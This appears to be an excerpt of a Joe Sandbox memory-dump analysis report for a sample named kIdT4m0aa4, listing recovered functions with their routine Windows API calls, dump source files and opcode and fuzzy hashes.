                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: afa72da564cdf59b12284fc9826a872f24ff522b4188ff4544a24d7ac92243a9
                                                            • Instruction ID: f57993e6aac6344007171e647144eec5a3d76b19c30e47a6edccf918f6c4f901
                                                            • Opcode Fuzzy Hash: afa72da564cdf59b12284fc9826a872f24ff522b4188ff4544a24d7ac92243a9
                                                            • Instruction Fuzzy Hash: 4C018C30810794DAD725F7B8C0417EDFBA49F64304F68848EA95653382CBB46B09E7A2
                                                            Function 00CC9620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: 38cb123a5dce571631a17392b854281b1b7c788a1d3932988227d428c2ac61fb
                                                            • Instruction ID: 210fb91f7e8d684acc0e6d22dbfee8ce981e6e9a22c00fec4375d085a31e97ed
                                                            • Opcode Fuzzy Hash: 38cb123a5dce571631a17392b854281b1b7c788a1d3932988227d428c2ac61fb
                                                            • Instruction Fuzzy Hash: 5FF08270481B559FDB308A24C55CF92B7E8EB12321F045B5EE0F7429E0D771AA8DDA50
                                                            Function 00CCA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                              • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                              • Part of subcall function 00CCA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: 3e3b6985d9a27902eb593dac6d668d6fdb1ae65fcc68f8713c9ca3f3d2268a79
                                                            • Instruction ID: 32c283802877f1229fdfe14fcd86076f67a26e894a71bfe1e0b321be27d71cc8
                                                            • Opcode Fuzzy Hash: 3e3b6985d9a27902eb593dac6d668d6fdb1ae65fcc68f8713c9ca3f3d2268a79
                                                            • Instruction Fuzzy Hash: A4F08232408794BACB2257B4C909FDB7B906F1A339F04CA4EF1FD52196C2755494AB23
                                                            Function 00CD0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00CD0E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: a78e2fba374cc9e2f50d97465ec87a48903b78118ced432400e4f05cd8da11ac
                                                            • Instruction ID: 3a7886db9a5b74c353ab8a8bed5ffb4bbb9e2685abf7b9c34ebf2ed297013d6e
                                                            • Opcode Fuzzy Hash: a78e2fba374cc9e2f50d97465ec87a48903b78118ced432400e4f05cd8da11ac
                                                            • Instruction Fuzzy Hash: 9ED0C25060109436EA1137286915BFE26068FC6311F0C002BF68957782CE840886B272
                                                            Function 00CDA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                              • Part of subcall function 00CDA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: 03f77114d4934992448d000375a7d1f5fd8bb19fd6de9630e77b2c3b179e8863
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: 63D0C771214209BADF416B61CC1297E7595EB01340F048127BA41D5351EAF1D911A556
                                                            Function 00CDE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 00CDE5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: 622f7e2c3c0afc7e97994772938270ed1d33937337532c50974220fcacbd3d00
                                                            • Instruction ID: 3120791142763dc701e80dd8d2fe227639f1cd239e8251bb4e21796bdc6e6ef1
                                                            • Opcode Fuzzy Hash: 622f7e2c3c0afc7e97994772938270ed1d33937337532c50974220fcacbd3d00
                                                            • Instruction Fuzzy Hash: 92D0A9BC0882408AC212FBA8A8827187250B330B44F804153F334C9390EA6080C2F622
                                                            Function 00CDDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CD1B3E), ref: 00CDDD92
                                                              • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                              • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                              • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010456,?), ref: 00CDB59E
                                                              • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                              • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            • Opcode ID: b39a11209d142b0ec5f8ae8be98e72243efce0bda21c03fd1640651bfbe2aff7
                                                            • Instruction ID: e531e7e2424602b1463601a810f241704a60473cea15213258143b83ed08ea89
                                                            • Opcode Fuzzy Hash: b39a11209d142b0ec5f8ae8be98e72243efce0bda21c03fd1640651bfbe2aff7
                                                            • Instruction Fuzzy Hash: 85D09E31144300BAD6122B51DD06F0A7AA2AB98B04F404555B384741B286729D31EF11
                                                            Function 00CC98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,00CC97BE), ref: 00CC98C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: d2a30f54257d40b780d4f57ee64c62dbb3453776adfed8a356e2456b21983bce
                                                            • Instruction ID: 90c4875ed8baf03cd8750f7532d88da876f26329fb6392be1beab35c92f1e97a
                                                            • Opcode Fuzzy Hash: d2a30f54257d40b780d4f57ee64c62dbb3453776adfed8a356e2456b21983bce
                                                            • Instruction Fuzzy Hash: 93C01234800145958E204624D84C6997711EA53365BB486D8C0388A0E1C332CD47EA01
                                                            Function 00CDE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: aa31872abf5f4143b54708f509934a294b57586a846f171030b5340a6397db15
                                                            • Instruction ID: 9ce15e9890fb3a5c607f063160668b835430f537d228528e8dc45fe39d4a87ca
                                                            • Opcode Fuzzy Hash: aa31872abf5f4143b54708f509934a294b57586a846f171030b5340a6397db15
                                                            • Instruction Fuzzy Hash: 00B012D535C244BC3104314A2D42C3B010CC0C1B28330843FFE01C86C1D840AC103832
                                                            Function 00CDE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                            • Instruction ID: cc07e88e0541398dd6d04932ef4a4972d2b24716ddb40f41c925dd842d458061
                                                            • Opcode Fuzzy Hash: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                            • Instruction Fuzzy Hash: A5B012D535C248AC3144714E2D42C3B010CC0C0B28330403FFA05C83C1D8406C103932
                                                            Function 00CDE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                            • Instruction ID: 8c101ed0473f597e093d72fa7a866f0a20d50b8a6de4be5e3516e933685b9e89
                                                            • Opcode Fuzzy Hash: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                            • Instruction Fuzzy Hash: 9DB012D135C244AC3144720A2D02C3B010CC0C1B28330C03FFE09C83C1D840AC043432
                                                            Function 00CDE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                            • Instruction ID: 98e1d1531db4a489c56d3a40a5c3688a3ddbaae7d986e228578123b867f628a7
                                                            • Opcode Fuzzy Hash: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                            • Instruction Fuzzy Hash: DBB012E135C154AC3144710A2E03C3B018CC0C0B28330403FFA05C83C1DC406D013432
                                                            Function 00CDE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                            • Instruction ID: 38709f3a1525955a5090fee80ce97513b68b79b595965d2b3fedc11caa7895bb
                                                            • Opcode Fuzzy Hash: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                            • Instruction Fuzzy Hash: 75B012D135D184AC3148710A2D02C3B010DC0C1B28330803FFE05C83C1D840AC403432
                                                            Function 00CDE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                            • Instruction ID: f97fd66f695532eb05434c82143a4933a4fa1caa00f77ffb861a854a69bf9435
                                                            • Opcode Fuzzy Hash: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                            • Instruction Fuzzy Hash: 3FB012E135D284BC3188720A2D02C3B010DC0C0B28330413FFA05C83C1D8406C443432
                                                            Function 00CDE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                            • Instruction ID: 54d91ef4607e92cc17a9debe6fed04dbb040e2aab48591c3f293e00d43f20e13
                                                            • Opcode Fuzzy Hash: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                            • Instruction Fuzzy Hash: 1AB012D135C154AC3144711A2D02C3B014CC0C1B28330803FFF05C83C1D840AC003432
                                                            Function 00CDE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
